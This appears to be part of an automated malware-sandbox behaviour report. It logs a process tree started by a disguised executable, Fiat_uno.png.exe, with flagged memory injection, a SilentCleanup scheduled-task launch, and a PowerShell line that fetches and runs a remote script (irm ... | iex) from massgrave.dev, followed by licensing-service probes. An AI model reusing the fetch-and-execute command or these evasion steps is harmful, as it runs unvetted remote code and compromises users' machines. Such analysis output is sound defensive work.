PID 4260 wrote to memory of 740	4260	dllhost.exe	10
PID 4260 wrote to memory of 900	4260	dllhost.exe	13
PID 4260 wrote to memory of 1008	4260	dllhost.exe	14
PID 4260 wrote to memory of 440	4260	dllhost.exe	15
PID 4260 wrote to memory of 832	4260	dllhost.exe	17
PID 4260 wrote to memory of 1056	4260	dllhost.exe	18
PID 4260 wrote to memory of 1064	4260	dllhost.exe	19
PID 4260 wrote to memory of 1212	4260	dllhost.exe	21
PID 4260 wrote to memory of 1224	4260	dllhost.exe	22
PID 4260 wrote to memory of 1264	4260	dllhost.exe	23
PID 4260 wrote to memory of 1308	4260	dllhost.exe	24
PID 4260 wrote to memory of 1388	4260	dllhost.exe	25
PID 4260 wrote to memory of 1452	4260	dllhost.exe	26
PID 4260 wrote to memory of 1468	4260	dllhost.exe	27
PID 4260 wrote to memory of 1520	4260	dllhost.exe	28
PID 4260 wrote to memory of 1568	4260	dllhost.exe	29
PID 4260 wrote to memory of 1576	4260	dllhost.exe	30
PID 4260 wrote to memory of 1684	4260	dllhost.exe	31
PID 4260 wrote to memory of 1708	4260	dllhost.exe	32
PID 4260 wrote to memory of 1800	4260	dllhost.exe	33
PID 4260 wrote to memory of 1808	4260	dllhost.exe	34
PID 4260 wrote to memory of 1860	4260	dllhost.exe	35
PID 4260 wrote to memory of 1920	4260	dllhost.exe	36
PID 4260 wrote to memory of 1748	4260	dllhost.exe	37
PID 4260 wrote to memory of 2100	4260	dllhost.exe	38
PID 4260 wrote to memory of 2144	4260	dllhost.exe	39
PID 4260 wrote to memory of 2348	4260	dllhost.exe	40
PID 4260 wrote to memory of 2364	4260	dllhost.exe	41
PID 4260 wrote to memory of 2372	4260	dllhost.exe	42
PID 4260 wrote to memory of 2432	4260	dllhost.exe	43
PID 4260 wrote to memory of 2576	4260	dllhost.exe	44
PID 4260 wrote to memory of 2592	4260	dllhost.exe	45
PID 4260 wrote to memory of 2616	4260	dllhost.exe	46
PID 4260 wrote to memory of 2624	4260	dllhost.exe	47
PID 4260 wrote to memory of 2696	4260	dllhost.exe	48
PID 4260 wrote to memory of 2916	4260	dllhost.exe	49
PID 4260 wrote to memory of 3024	4260	dllhost.exe	50
PID 4260 wrote to memory of 3040	4260	dllhost.exe	51
PID 4260 wrote to memory of 2236	4260	dllhost.exe	52
PID 4260 wrote to memory of 3292	4260	dllhost.exe	53
PID 4260 wrote to memory of 3412	4260	dllhost.exe	54

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:584
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1008
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{159f1f58-b7dc-4957-ac3c-bfd7ae2d0e6d}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4260
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b7510d7d-9732-48fd-b64c-b177993d5d58}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2652

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:640

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:740

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:900

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:440

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:832

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1056
- c:\windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2236

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1064

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1212

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1224

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1264

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1308

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1388

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1452
- c:\windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3024

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1468

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1520

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1568

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1684

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1808

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1860

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1920

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1748

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2100

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2144

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2348

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2364

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2372

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2432

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2576

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2592

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2616

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2624

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2696

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2916

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:3040

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3292

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3412
- C:\Users\Admin\AppData\Local\Temp\Fiat_uno.png.exe
  "C:\Users\Admin\AppData\Local\Temp\Fiat_uno.png.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /C cmd.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1488
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4248
  - - C:\Windows\system32\cmd.exe
      cmd.exe
      4⤵
      PID:2668
- - C:\Windows\SYSTEM32\SCHTASKS.exe
    "SCHTASKS.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
    3⤵
    PID:1332
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /C powershell | irm https://massgrave.dev/get | iex
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1916
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell
      4⤵
      PID:2604
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0
  2⤵
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of AdjustPrivilegeToken
  PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\MAS_49734917.cmd" "
    3⤵
    PID:4124
  - - C:\Windows\System32\sc.exe
      sc query Null
      4⤵
      Launches sc.exe
      PID:4704
  - - C:\Windows\System32\find.exe
      find /i "RUNNING"
      4⤵
      PID:4948
  - - C:\Windows\System32\findstr.exe
      findstr /v "$" "MAS_49734917.cmd"
      4⤵
      PID:4208
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ver
      4⤵
      PID:1052
  - - C:\Windows\System32\reg.exe
      reg query "HKCU\Console" /v ForceV2
      4⤵
      PID:2180
  - - C:\Windows\System32\find.exe
      find /i "0x0"
      4⤵
      PID:1940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c echo prompt $E | cmd
      4⤵
      PID:2012
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo prompt $E "
        5⤵
        
        PID:3216
    - - C:\Windows\System32\cmd.exe
        
        cmd
        5⤵
        
        PID:4444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Windows\Temp\MAS_49734917.cmd" "
      4⤵
      PID:1980
  - - C:\Windows\System32\find.exe
      find /i "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:2980
  - - C:\Windows\System32\fltMC.exe
      fltmc
      4⤵
      PID:4840
  - - C:\Windows\System32\reg.exe
      reg query HKCU\Console /v QuickEdit
      4⤵
      Modifies registry key
      PID:2768
  - - C:\Windows\System32\find.exe
      find /i "0x0"
      4⤵
      PID:2192
  - - C:\Windows\System32\reg.exe
      reg add HKCU\Console /v QuickEdit /t REG_DWORD /d "0" /f
      4⤵
      Modifies registry key
      PID:680
  - - C:\Windows\System32\cmd.exe
      cmd.exe /c ""C:\Windows\Temp\MAS_49734917.cmd" -qedit"
      4⤵
      PID:2776
    - - C:\Windows\System32\reg.exe
        
        reg add HKCU\Console /v QuickEdit /t REG_DWORD /d "1" /f
        5⤵
        Modifies registry key
        
        PID:4508
    - - C:\Windows\System32\sc.exe
        
        sc query Null
        5⤵
        Launches sc.exe
        
        PID:2204
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:4196
    - - C:\Windows\System32\findstr.exe
        
        findstr /v "$" "MAS_49734917.cmd"
        5⤵
        
        PID:2672
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo "-qedit" "
        5⤵
        
        PID:1960
    - - C:\Windows\System32\find.exe
        
        find /i "/"
        5⤵
        
        PID:3432
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        5⤵
        
        PID:3956
    - - C:\Windows\System32\reg.exe
        
        reg query "HKCU\Console" /v ForceV2
        5⤵
        
        PID:2140
    - - C:\Windows\System32\find.exe
        
        find /i "0x0"
        5⤵
        
        PID:1628
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c echo prompt $E | cmd
        5⤵
        
        PID:4924
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo prompt $E "
        6⤵
        
        PID:4784
      - C:\Windows\System32\cmd.exe
        
        cmd
        6⤵
        
        PID:3640
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Windows\Temp\MAS_49734917.cmd" "
        5⤵
        
        PID:3980
    - - C:\Windows\System32\find.exe
        
        find /i "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:3160
    - - C:\Windows\System32\fltMC.exe
        
        fltmc
        5⤵
        
        PID:4484
    - - C:\Windows\System32\reg.exe
        
        reg query HKCU\Console /v QuickEdit
        5⤵
        
        PID:4256
    - - C:\Windows\System32\find.exe
        
        find /i "0x0"
        5⤵
        
        PID:4232
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ping -4 -n 1 updatecheck.massgrave.dev
        5⤵
        
        PID:3108
      - C:\Windows\System32\PING.EXE
        
        ping -4 -n 1 updatecheck.massgrave.dev
        6⤵
        Runs ping.exe
        
        PID:4592
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo "127.69.2.6" "
        5⤵
        
        PID:1328
    - - C:\Windows\System32\find.exe
        
        find "127.69"
        5⤵
        
        PID:4848
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo "127.69.2.6" "
        5⤵
        
        PID:4120
    - - C:\Windows\System32\find.exe
        
        find "127.69.2.6"
        5⤵
        
        PID:4716
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo "-qedit" "
        5⤵
        
        PID:1740
    - - C:\Windows\System32\find.exe
        
        find /i "/S"
        5⤵
        
        PID:4132
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo "-qedit" "
        5⤵
        
        PID:3704
    - - C:\Windows\System32\find.exe
        
        find /i "/"
        5⤵
        
        PID:828
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop
        5⤵
        
        PID:2648
      - C:\Windows\System32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop
        6⤵
        
        PID:3008
    - - C:\Windows\System32\mode.com
        
        mode 76, 30
        5⤵
        
        PID:5072
    - - C:\Windows\System32\choice.exe
        
        choice /C:123456780 /N
        5⤵
        
        PID:872
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        5⤵
        
        PID:2912
    - - C:\Windows\System32\reg.exe
        
        reg query "HKCU\Console" /v ForceV2
        5⤵
        
        PID:4588
    - - C:\Windows\System32\find.exe
        
        find /i "0x0"
        5⤵
        
        PID:200
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c echo prompt $E | cmd
        5⤵
        
        PID:4604
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo prompt $E "
        6⤵
        
        PID:4904
      - C:\Windows\System32\cmd.exe
        
        cmd
        6⤵
        
        PID:748
    - - C:\Windows\System32\mode.com
        
        mode 110, 34
        5⤵
        
        PID:4564
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe $ExecutionContext.SessionState.LanguageMode
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2924
    - - C:\Windows\System32\find.exe
        
        find /i "Full"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')"
        5⤵
        
        PID:3080
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:400
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo "Windows 10 Pro" "
        5⤵
        
        PID:1548
    - - C:\Windows\System32\find.exe
        
        find /i "Windows"
        5⤵
        
        PID:2264
    - - C:\Windows\System32\wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get CreationClassName /value
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2220
    - - C:\Windows\System32\find.exe
        
        find /i "computersystem"
        5⤵
        
        PID:3732
    - - C:\Windows\System32\sc.exe
        
        sc start sppsvc
        5⤵
        Launches sc.exe
        
        PID:4208
    - - C:\Windows\System32\wbem\WMIC.exe
        
        wmic path SoftwareLicensingProduct where (LicenseStatus='1' and GracePeriodRemaining='0' and PartialProductKey is not NULL) get Name /value
        5⤵
        
        PID:1052
    - - C:\Windows\System32\findstr.exe
        
        findstr /i "Windows"
        5⤵
        
        PID:3572
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); [void]$TypeBuilder.DefinePInvokeMethod('SLGetWindowsInformationDWORD', 'slc.dll', 'Public, Static', 1, [int], @([String], [int].MakeByRefType()), 1, 3); $Sku = 0; [void]$TypeBuilder.CreateType()::SLGetWindowsInformationDWORD('Kernel-BrandingInfo', [ref]$Sku); $Sku"
        5⤵
        
        PID:1980
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); [void]$TypeBuilder.DefinePInvokeMethod('SLGetWindowsInformationDWORD', 'slc.dll', 'Public, Static', 1, [int], @([String], [int].MakeByRefType()), 1, 3); $Sku = 0; [void]$TypeBuilder.CreateType()::SLGetWindowsInformationDWORD('Kernel-BrandingInfo', [ref]$Sku); $Sku
        6⤵
        
        PID:2980
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\ProductOptions" /v OSProductPfn 2>nul
        5⤵
        
        PID:4196
      - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\ProductOptions" /v OSProductPfn
        6⤵
        
        PID:3576
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic Path Win32_OperatingSystem Get OperatingSystemSKU /format:LIST" 2>nul
        5⤵
        
        PID:4216
      - C:\Windows\System32\wbem\WMIC.exe
        
        wmic Path Win32_OperatingSystem Get OperatingSystemSKU /format:LIST
        6⤵
        
        PID:4580
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE
        5⤵
        
        PID:3032
      - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE
        6⤵
        
        PID:1628
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        5⤵
        
        PID:1996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ping -n 1 l.root-servers.net
        5⤵
        
        PID:3640
      - C:\Windows\System32\PING.EXE
        
        ping -n 1 l.root-servers.net
        6⤵
        Runs ping.exe
        
        PID:2792
    - - C:\Windows\System32\reg.exe
        
        reg query "HKCU\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled
        5⤵
        
        PID:3160
    - - C:\Windows\System32\find.exe
        
        find /i "0x0"
        5⤵
        
        PID:3424
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled
        5⤵
        
        PID:1696
    - - C:\Windows\System32\find.exe
        
        find /i "0x0"
        5⤵
        
        PID:1348
    - - C:\Windows\System32\sc.exe
        
        sc start ClipSVC
        5⤵
        Launches sc.exe
        
        PID:2684
    - - C:\Windows\System32\sc.exe
        
        sc query ClipSVC
        5⤵
        Launches sc.exe
        
        PID:2896
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v DependOnService
        5⤵
        Modifies registry key
        
        PID:4848
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Description
        5⤵
        Modifies registry key
        
        PID:4120
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v DisplayName
        5⤵
        Modifies registry key
        
        PID:316
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:4544
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ImagePath
        5⤵
        
        PID:4144
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ObjectName
        5⤵
        
        PID:2324
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Start
        5⤵
        Modifies registry key
        
        PID:992
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Type
        5⤵
        Modifies registry key
        
        PID:2648
    - - C:\Windows\System32\sc.exe
        
        sc start wlidsvc
        5⤵
        
        PID:5072
    - - C:\Windows\System32\sc.exe
        
        sc query wlidsvc
        5⤵
        Launches sc.exe
        
        PID:700
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v DependOnService
        5⤵
        Modifies registry key
        
        PID:2344
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v Description
        5⤵
        Modifies registry key
        
        PID:4520
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v DisplayName
        5⤵
        Modifies registry key
        
        PID:1372
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v ErrorControl
        5⤵
        
        PID:2772
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v ImagePath
        5⤵
        Modifies registry key
        
        PID:4688
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v ObjectName
        5⤵
        Modifies registry key
        
        PID:872
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v Start
        5⤵
        Modifies registry key
        
        PID:2328
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v Type
        5⤵
        
        PID:4588
    - - C:\Windows\System32\sc.exe
        
        sc start sppsvc
        5⤵
        Launches sc.exe
        
        PID:4200
    - - C:\Windows\System32\sc.exe
        
        sc query sppsvc
        5⤵
        Launches sc.exe
        
        PID:1352
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v DependOnService
        5⤵
        
        PID:748
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Description
        5⤵
        Modifies registry key
        
        PID:304
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v DisplayName
        5⤵
        
        PID:4732
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:4228
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ImagePath
        5⤵
        Modifies registry key
        
        PID:2644
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ObjectName
        5⤵
        
        PID:1948
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Start
        5⤵
        Modifies registry key
        
        PID:2332
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Type
        5⤵
        
        PID:3400
    - - C:\Windows\System32\sc.exe
        
        sc start KeyIso
        5⤵
        Launches sc.exe
        
        PID:4448
    - - C:\Windows\System32\sc.exe
        
        sc query KeyIso
        5⤵
        Launches sc.exe
        
        PID:3452
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v DependOnService
        5⤵
        Modifies registry key
        
        PID:196
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Description
        5⤵
        
        PID:4284
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v DisplayName
        5⤵
        Modifies registry key
        
        PID:2924
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:4712
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ImagePath
        5⤵
        Modifies registry key
        
        PID:4328
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ObjectName
        5⤵
        Modifies registry key
        
        PID:1016
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Start
        5⤵
        Modifies registry key
        
        PID:3480
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Type
        5⤵
        
        PID:2268
    - - C:\Windows\System32\sc.exe
        
        sc start LicenseManager
        5⤵
        Launches sc.exe
        
        PID:1384
    - - C:\Windows\System32\sc.exe
        
        sc query LicenseManager
        5⤵
        Launches sc.exe
        
        PID:4728
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v DependOnService
        5⤵
        Modifies registry key
        
        PID:1236
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v Description
        5⤵
        Modifies registry key
        
        PID:3080
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v DisplayName
        5⤵
        Modifies registry key
        
        PID:2656
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v ErrorControl
        5⤵
        
        PID:4472
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v ImagePath
        5⤵
        Modifies registry key
        
        PID:3524
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v ObjectName
        5⤵
        
        PID:4892
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v Start
        5⤵
        Modifies registry key
        
        PID:2984
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v Type
        5⤵
        
        PID:168
    - - C:\Windows\System32\sc.exe
        
        sc start Winmgmt
        5⤵
        Launches sc.exe
